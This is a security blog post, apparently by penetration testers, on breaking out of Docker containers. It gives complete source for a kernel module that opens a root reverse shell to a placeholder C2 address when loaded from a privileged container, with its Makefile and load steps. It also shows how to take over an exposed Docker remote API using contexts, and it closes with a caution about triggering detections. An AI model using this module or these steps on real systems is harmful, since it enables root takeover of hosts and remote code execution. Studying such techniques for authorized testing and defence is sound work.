Breaking Free: Docker, Development, and Breakout

OVERVIEW

Containers have been around for more than two decades, with Docker being one of the most popular container platforms. We regularly encounter containers while using the internet, either directly (e.g., a frontend UI served from containers) or indirectly (e.g., backend components running in containers).

During security engagements, it’s also very common to find services running on top of containers, and a decent number of them run on Docker. In this blog, we’ll look at some of the ways Docker is used in DevOps and how we can leverage them during our engagements.

CASE STUDIES

Docker containers as CI/CD builder machines

In CI/CD pipelines, containers are used during the build stage to build artifacts from the source code. To make this work, many pipelines run these containers with the privileged flag, which, among other things, grants them all Linux capabilities. This is dangerous from a security perspective: anyone who gains access to such a container can potentially escape to the underlying host. It gets even worse if the container is not ephemeral, because malware implanted in it will call home every time the container is reused.

Well, enough talk, let’s look into how we can leverage this during our testing.

Consider a scenario where we have broken into a client’s CI/CD pipeline and gained RCE in one of its privileged containers. Now we are inside a privileged container, wondering how to proceed. It’s simple, really: we just need to enumerate the container and figure out how to escape to the underlying host.

To begin our enumeration, we first need to identify the capabilities attached to this container. Although privileged containers generally get all capabilities, it never hurts to check first.

For this purpose, we’ll use the capsh tool, which is part of the libcap project. Running capsh --print returns the following output.

From the output shown in the image above, we can see that many capabilities are attached to this container. A little research into these capabilities turns up several potential ways to escape the container.
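The same check can also be scripted, which helps when capsh is not installed in the container. The effective capability set is exposed as a hex bitmask on the CapEff line of /proc/self/status (capsh --decode=<hex> turns such a mask into names). Below is a minimal POSIX shell sketch; decode_caps and all_caps_set are hypothetical helpers of our own, and the name table assumes the bit numbering from linux/capability.h up to CAP_CHECKPOINT_RESTORE (bit 40).

```shell
# Hypothetical helpers for decoding a Linux capability bitmask (e.g. CapEff).
# Capability names indexed by bit number, per linux/capability.h (bits 0..40).
CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw
ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct
sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease
audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm
block_suspend audit_read perfmon bpf checkpoint_restore"

# decode_caps HEX: print one cap_* name for every bit set in the bare hex mask
# (no 0x prefix, as printed in /proc/self/status). Bits above 40 are ignored.
decode_caps() {
    mask=$((0x$1))
    bit=0
    for name in $CAP_NAMES; do
        if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
            echo "cap_$name"
        fi
        bit=$((bit + 1))
    done
}

# all_caps_set HEX LAST_CAP: succeed if every bit 0..LAST_CAP is set in HEX,
# which is what we expect to see in a privileged container.
all_caps_set() {
    mask=$((0x$1))
    full=$(( (1 << ($2 + 1)) - 1 ))
    [ $(( mask & full )) -eq "$full" ]
}

# Example usage inside the container:
# capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
# decode_caps "$capeff" | grep -x cap_sys_module
# all_caps_set "$capeff" "$(cat /proc/sys/kernel/cap_last_cap)" && echo "looks privileged"
```

Reading the highest capability number from /proc/sys/kernel/cap_last_cap, rather than hard-coding 40, keeps the privileged check meaningful on kernels that know a different number of capabilities.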

For the demo, we’ll focus on the SYS_MODULE capability (CAP_SYS_MODULE), which allows us to load kernel modules. Since Docker containers share the host’s kernel, any module we load is inserted into the host kernel itself, which lets us execute code there.

To do this, let’s first copy our kernel module source and Makefile into the container. We’ll be using the code provided by this blog.

revshell.c

```c
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kmod.h>

MODULE_LICENSE("GPL");

static int start_shell(void){
	char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/<C2_IP>/<C2_PORT> 0>&1", NULL};
	static char *env[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
	return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC);
}

static int init_mod(void){
	return start_shell();
}

static void exit_mod(void){
	return;
}

module_init(init_mod);
module_exit(exit_mod);
```

Makefile

```makefile
obj-m += revshell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

Now that the required files are in the container, all we need to do is build and load our module (assuming the kernel headers for the host’s kernel and the other build tools are already installed; otherwise, we have to install them manually).
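Those prerequisites are quick to check before running make. The Makefile calls make -C /lib/modules/$(uname -r)/build, and because uname -r inside a container reports the host’s kernel release, that build tree has to match the host kernel. The two functions below are hypothetical helpers; the optional directory argument to have_build_tree exists only so the check can be pointed somewhere other than /lib/modules, and the tool check assumes gcc is the compiler in use.

```shell
# have_build_tree [MODULES_ROOT]: succeed if the kernel build tree for the
# running kernel exists. MODULES_ROOT defaults to /lib/modules.
have_build_tree() {
    dir="${1:-/lib/modules}/$(uname -r)/build"
    if [ -d "$dir" ]; then      # usually a symlink to the headers; -d follows it
        return 0
    fi
    echo "missing kernel build tree: $dir" >&2
    return 1
}

# have_build_tools: succeed if make and gcc (assumed compiler) are on PATH.
have_build_tools() {
    missing=0
    for tool in make gcc; do
        if ! command -v "$tool" >/dev/null 2>&1; then
            echo "missing tool: $tool" >&2
            missing=1
        fi
    done
    return "$missing"
}

# Usage inside the container, next to revshell.c and the Makefile:
# have_build_tree && have_build_tools && make
```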



The module is built by running make, which picks up the Makefile in the current directory. If everything goes well, the command exits with output similar to what is shown below.

If we then list the directory, several new files are present, as shown in the image below.

Of all these files, the one we’re interested in is revshell.ko (any file ending in .ko is a loadable kernel module). So let’s load it with insmod revshell.ko and have some fun.
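If insmod refuses the module with an "Invalid module format" error, a common cause is that it was built against headers for a different kernel than the one running. modinfo -F vermagic revshell.ko prints the module’s version magic, whose first field is the kernel release it was built for. The hypothetical helper below compares that field with uname -r before we try to load anything; it is a sketch, not a substitute for the kernel’s own checks.

```shell
# vermagic_matches VERMAGIC [RELEASE]: hypothetical helper that succeeds if the
# first field of a module's vermagic string equals RELEASE (default: uname -r).
vermagic_matches() {
    built_for=${1%% *}          # keep only the text before the first space
    running=${2:-$(uname -r)}
    [ "$built_for" = "$running" ]
}

# Usage before loading:
# vermagic_matches "$(modinfo -F vermagic revshell.ko)" && insmod revshell.ko
```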



Once the module is inserted into the kernel, our C2 server receives a reverse shell from the host itself, as shown in the image below.

A couple of important things stand out in the image above. First, the shell runs with root privileges, because call_usermodehelper launches the process from the kernel as root on the host. Second, the container listing shows the same container in which we listed the capabilities.



We can also verify the loaded module with lsmod | head -2, which gives the output below and confirms that the module is loaded into the host kernel.
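lsmod takes its data from /proc/modules, which is not namespaced, so even from inside the container it reflects the modules of the shared host kernel. A scripted version of the same check can read that file directly. module_loaded is a hypothetical helper, and its optional file argument exists only so it can be run against a saved copy.

```shell
# module_loaded NAME [MODULES_FILE]: succeed if NAME is listed as a loaded module.
# Each /proc/modules line starts with the module name, for example:
#   revshell 16384 0 - Live 0x0000000000000000
module_loaded() {
    awk -v name="$1" '$1 == name { found = 1 } END { exit !found }' "${2:-/proc/modules}"
}

# Usage:
# module_loaded revshell && echo "revshell is loaded in the (host) kernel"
```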

Let’s end this demo for now and look into another interesting Docker scenario which is quite common in development teams.

Docker in remote development scenarios

Docker is a handy tool for creating containers and one of the most common choices among development teams. However, many development teams are distributed around the globe and, for efficiency, use remote development machines. One way to access these machines is via SSH/RDP/VNC; another is to use the Docker API remotely. In this demo, we’ll see how the latter can be leveraged during an engagement.

Consider a scenario where we discover that the Docker remote API is enabled on one of the development machines, and we have bypassed the firewall by spoofing our IP address.



Let’s first verify the Docker remote API as shown in the image below.
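When the daemon listens on TCP without TLS, the Engine API answers requests such as GET /version without authentication, so a plain HTTP request is enough to confirm it (docker -H tcp://<REMOTE_MACHINE_IP>:<REMOTE_MACHINE_PORT> version does the same through the CLI). Below is a minimal sketch that assumes curl is installed. probe_docker_api is a hypothetical helper, 2375 is only the conventional plaintext Docker port, and the sed extraction assumes compact JSON rather than using a real JSON parser.

```shell
# probe_docker_api HOST [PORT]: hypothetical helper. Prints the Engine API
# version and succeeds if HOST:PORT answers like a Docker daemon.
probe_docker_api() {
    host=$1
    port=${2:-2375}             # conventional plaintext Docker port (assumption)
    resp=$(curl -fsS --max-time 5 "http://$host:$port/version") || return 1
    # Naive extraction: assumes compact JSON such as {"ApiVersion":"1.43",...}.
    version=$(printf '%s\n' "$resp" | sed -n 's/.*"ApiVersion":"\([^"]*\)".*/\1/p')
    [ -n "$version" ] || return 1
    echo "$version"
}

# Usage:
# probe_docker_api <REMOTE_MACHINE_IP> <REMOTE_MACHINE_PORT>
```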

OK, so the Docker remote API is enabled on this machine. While there are multiple ways to exploit this, we’ll use a built-in Docker feature called contexts. A context registers a remote Docker API endpoint with our local Docker CLI, so we can perform operations on the remote machine from our local machine with ease.

Let’s create a context for the development machine we identified and proceed with exploitation.

```shell
docker context create remote-dev-machine --docker "host=tcp://<REMOTE_MACHINE_IP>:<REMOTE_MACHINE_PORT>"
docker context use remote-dev-machine
```

Once that is done, the Docker commands we run locally are executed on the remote machine. This opens up several paths forward, one of which is gaining root access on the host by creating a privileged container and breaking out of it (as shown in the previous demo).

ENDING NOTE

Please note that these demos were conducted in a simulated lab environment. In a production setting, these tactics are likely to trigger detections, so one must proceed carefully.